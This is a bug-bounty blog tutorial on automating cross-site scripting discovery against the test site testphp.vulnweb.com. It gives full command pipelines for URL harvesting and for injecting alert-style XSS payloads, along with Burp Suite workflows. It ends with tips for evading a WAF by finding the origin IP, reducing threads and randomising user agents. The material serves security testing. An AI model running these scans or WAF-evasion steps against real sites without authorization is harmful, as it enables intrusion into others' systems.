Advanced XSS Discovery: Streamlining Your Attack Strategy with Cutting-Edge Automation Tools

Advanced XSS Discovery: Streamlining Your Attack Strategy with Automation Tools

Hi guys, My name is Mahmoud Attia aka 0xelkot. I’m an Info-Sec Engineer at Telecom Egypt, and bug hunter part time.

So let’s start :)

Our talk today about XSS.

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

So How to find it?

Our methodology to find it will be:

Understanding the Application: Get familiar with the web application you’re testing. Understand its functionality, inputs, outputs, and user roles. Identify areas where user input is accepted and processed.

Manual Testing:

Input Fields: Look for input fields such as forms, search bars, and comment sections where user input is accepted.

HTTP Methods: Test all HTTP methods (GET, POST, PUT, DELETE) to see how the application handles input.

HTML Contexts: Understand where the input is being reflected (e.g., within HTML tags, attribute values, JavaScript code) and how it’s processed.

But we can’t do it for all inputs :(

So let’s Automate some process to find XSS:

Lets take a real target to think about:

If we will take `testphp.vulnweb.com` as a target, what we will do?

Find all endpoints and parameters.

Web archive.

Crawler.

Burp Spider.

Fuzzing.

Web archive

Tools:

waybackurls.

gau.

gospider.

Hakrawler.

Katana.

echo 'http://testphp.vulnweb.com' | waybackurls | anew wayback.txt
echo 'http://testphp.vulnweb.com' | gau | anew gau.txt
echo 'http://testphp.vulnweb.com' | katana | anew katana.txt
gospider -s "http://testphp.vulnweb.com/" -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | anew gospider.txt
hakrawler -url "http://testphp.vulnweb.com" -plain -usewayback -wayback | grep "testphp.vulnweb.com" | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | anew hakrawler.txt
cat wayback.txt gau.txt katana.txt gospider.txt hakrawler.txt | anew paths.txt

We collect all paths and endpoints for out target, we can start attack now or we do some fuzzing first.

Here I would like to grep URLs with extensions like (.php,.asp,.aspx) and start Fuzzing for Hidden Parameters using arjun:

arjun -i ext-paths.txt -oT ext-paths-arjun.txt
-i is for Urls input.
-oT is for Output as a text file.

Here we will start to automate XSS, I have a three ways of attacks:

Via Bash Script

Tools:

Kxss : To find reflected values.

uro: Declutters url lists for crawling.

gf: A wrapper around grep, to help you grep for things.

qsreplace: To replace all query string values with a user-supplied value.

Freq: To find alert values.

airixss: To find XSS during recon.

dalfox : It’s a powerfull XSS scanner.

First Case:

#1

Tools : {gau, gf, uro, qsreplace, freq}.

Command:
echo http://testphp.vulnweb.com | gau | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq

gau: To collect all paths from web archive.

gf: To grep xss filenames.

uro: To declutters url lists for reduce URLs to attack.

qsreplace: To replace values to XSS payloads.

Freq: To match responses with input value and Check Fired XSS.

#2

Tools: {kxss, awk, dalfox}.

Command:
cat param.txt | kxss | awk '{print $9}'| dalfox pipe

Param.txt : This is the file of URLs with parameters after all of the above scans.

Kxss: To find reflected filename and value.

awk: To print column of URLs.

dalfox: To scan XSS.

#3

Tools: {qsreplace, airixss}.

Command:
cat param.txt | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
echo http://testphp.vulnweb.com | gau | gf xss | uro |qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"

gau: To collect all paths from web archive.

gf: To grep xss filenames.

uro: To declutters url lists for reduce URLs to attack.

qsreplace: To replace values to XSS payloads.

airixss: To find XSS during recon.

Second Case:

It’s to find XSS Vulnerabilities via xray.

To install xray well:

./xray_linux_amd64 x # write it twice to create a config file

So what xray will do ?

Crawl The input URL.

Fetch inputs on URLs and all parameters on (GET/POST) requests.

Start XSS attack.

Command:
.\xray_windows_386.exe ws --basic http://testphp.vulnweb.com --plugin xss --ho testphp.html

ws : This for web scanning.

basic : This for basic crawling.

plugin: This for choose plugins of vulnerabilities to attack.

ho : This is for HTML Output.

Third Case:

It’s to find XSS via Burp suite:

Here we will have a lot of methodologies, I will show you a three of them.

Extensions Required here:

Reflector: It’s looks for request parameter values that are reflected in the response.

Intruder: It’s a tool for automating customized attacks against web applications. It enables you to configure attacks that send the same HTTP request over and over again, inserting different payloads into predefined positions each time.

Burp Bounty: It’s an extension of Burp Suite that allows you, in a quick and simple way, to improve the active and passive scanner by means of personalized rules through a very intuitive graphical interface.

#1

Basic XSS Detection:

Crawl URL with Burp spider.

Check Reflector to get reflected values.

Start Attack using Burp active scan.

#2

Finding XSS using Intruder:

Get a reflected parameter.

Move it to intruder.

Put a XSS Payloads.

In match and Grep check for alert(1).

Start Attacking and grep for alert(1) column and you will find urls vulnerable of XSS.

#3

Finding XSS using Burp Bounty:

Burp bounty have a lot of profiles that’s can check for XSS on GET and POST request with all parameters on (URLs, Body Reuqests, Headers, etc..).

Crawl URLs via Burp spider.

Check reflected Parameters.

Scan it via Burp bounty.

That’s all here

I will show you some result of last days of finding XSS.

NOTE:

If you find your target running a WAF , DON’T test with the above methodology, try to find origin IP and test on it.If you will test on a WAF, So try to reduce threads to evade any blocking.Or try to use random agents beside reduect threads to get XSS results.

Thanks for reading, and hope you get a tons of XSS.

You can reach with me at:

twitter

linkedIn

See y’all next time till then.

Happy Hacking ❤